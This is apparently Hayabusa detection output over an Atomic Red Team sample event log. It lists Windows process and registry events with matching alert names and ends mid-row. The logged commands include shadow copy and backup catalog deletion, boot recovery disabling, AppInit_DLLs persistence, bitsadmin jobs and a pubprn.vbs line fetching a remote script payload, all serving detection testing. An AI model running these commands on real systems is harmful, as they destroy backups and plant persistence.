2019-07-19 23:47:37.096 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3968 | PGUID: 747F3D96-D809-5D31-0000-00100A242B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:37.127 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" | LID: 0x50951 | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - AppInit | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs: C:\Tools\MessageBox64.dll,C:\Tools\MessageBox32.dll | Process: C:\Windows\system32\reg.exe | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,Persis,New DLL Added to AppInit_DLLs Registry Key,,rules/sigma/registry_event/sysmon_new_dll_added_to_appinit_dlls_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Windows Load | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:37.215 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 980 | PGUID: 747F3D96-D809-5D31-0000-001072292B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:40.691 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6896 | PGUID: 747F3D96-D80C-5D31-0000-0010223C2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: vssadmin.exe delete shadows /all /quiet | Process: C:\Windows\System32\vssadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" | LID: 0x50951 | PID: 1124 | PGUID: 747F3D96-D80C-5D31-0000-0010843F2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,critical,Evas | Impact,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/proc_creation_win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:40.863 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1348 | PGUID: 747F3D96-D80C-5D31-0000-001005542B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4500 | PGUID: 747F3D96-D811-5D31-0000-001000632B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wbadmin.exe delete catalog -quiet | Process: C:\Windows\System32\wbadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" | LID: 0x50951 | PID: 6160 | PGUID: 747F3D96-D811-5D31-0000-001061652B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,Evas | Impact,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/proc_creation_win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.773 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wbengine.exe"" | Process: C:\Windows\System32\wbengine.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6064 | PGUID: 747F3D96-D811-5D31-0000-0010726A2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.958 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\vds.exe | Process: C:\Windows\System32\vds.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3184 | PGUID: 747F3D96-D811-5D31-0000-0010147C2B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:46.112 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2948 | PGUID: 747F3D96-D812-5D31-0000-0010AC892B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:46.302 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\wbengine.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6064 | PGUID: 747F3D96-D811-5D31-0000-0010726A2B00 | Hash: SHA1=BE65E71FC691867FFA1D3129CEAB67A0688A08CB,MD5=9A0C13D674AB2D72193653EF38D8FB8E,SHA256=15817A5CB717D4846AE753A27CD8859BCE63004143083027FA5EC9324DFC5188,IMPHASH=5694D579C32F1A7EB5FA54148C174C38",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:51.816 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6508 | PGUID: 747F3D96-D817-5D31-0000-001064AD2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures | Process: C:\Windows\System32\bcdedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D817-5D31-0000-001097B02B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,high,Impact,Modification of Boot Configuration,,rules/sigma/process_creation/proc_creation_win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6216 | PGUID: 747F3D96-D817-5D31-0000-001049B42B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bcdedit.exe /set {default} recoveryenabled no | Process: C:\Windows\System32\bcdedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" | LID: 0x50951 | PID: 5984 | PGUID: 747F3D96-D817-5D31-0000-0010B7B62B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,high,Impact,Modification of Boot Configuration,,rules/sigma/process_creation/proc_creation_win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:52.046 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7040 | PGUID: 747F3D96-D817-5D31-0000-0010C8BA2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:57.227 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sdelete.exe C:\some\file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1632 | PGUID: 747F3D96-D81D-5D31-0000-0010B8CA2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:57.274 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7080 | PGUID: 747F3D96-D81D-5D31-0000-0010D7CD2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:04.103 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6736 | PGUID: 747F3D96-D824-5D31-0000-001023F42B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 1540 | PGUID: 747F3D96-D824-5D31-0000-001075F62B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,rules/sigma/process_creation/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:05.365 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5808 | PGUID: 747F3D96-D825-5D31-0000-0010CF222C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.640 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D83E-5D31-0000-0010F0D02E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.660 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /create AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" | LID: 0x50951 | PID: 4508 | PGUID: 747F3D96-D83E-5D31-0000-001042D32E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4036 | PGUID: 747F3D96-D83E-5D31-0000-0010A2D72E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,medium,Evas,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 3732 | PGUID: 747F3D96-D83E-5D31-0000-0010AAD92E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,rules/sigma/process_creation/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Evas,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.900 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7072 | PGUID: 747F3D96-D83E-5D31-0000-001088DE2E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.917 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 3204 | PGUID: 747F3D96-D83E-5D31-0000-0010DAE02E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:31.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4332 | PGUID: 747F3D96-D83E-5D31-0000-001046E52E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:31.041 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /complete AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" | LID: 0x50951 | PID: 388 | PGUID: 747F3D96-D83F-5D31-0000-0010A2E72E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:31.134 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3760 | PGUID: 747F3D96-D83F-5D31-0000-001001EC2E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:31.157 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /resume AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" | LID: 0x50951 | PID: 3704 | PGUID: 747F3D96-D83F-5D31-0000-001053EE2E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:31.240 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4888 | PGUID: 747F3D96-D83F-5D31-0000-00105EF22E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:36.834 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-D844-5D31-0000-001075082F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost 
script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | LID: 0x50951 | PID: 2484 | PGUID: 747F3D96-D844-5D31-0000-0010C70A2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:37.264 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2624 | PGUID: 747F3D96-D845-5D31-0000-001098212F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2096 | PGUID: 